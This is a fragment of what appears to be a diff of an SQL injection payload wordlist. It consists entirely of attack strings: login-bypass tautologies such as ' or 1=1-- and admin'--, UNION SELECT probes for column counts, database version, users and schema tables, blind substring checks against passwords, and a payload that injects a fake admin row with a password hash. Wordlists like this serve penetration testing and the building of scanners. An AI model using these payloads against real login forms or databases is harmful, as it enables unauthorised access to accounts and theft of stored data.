') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
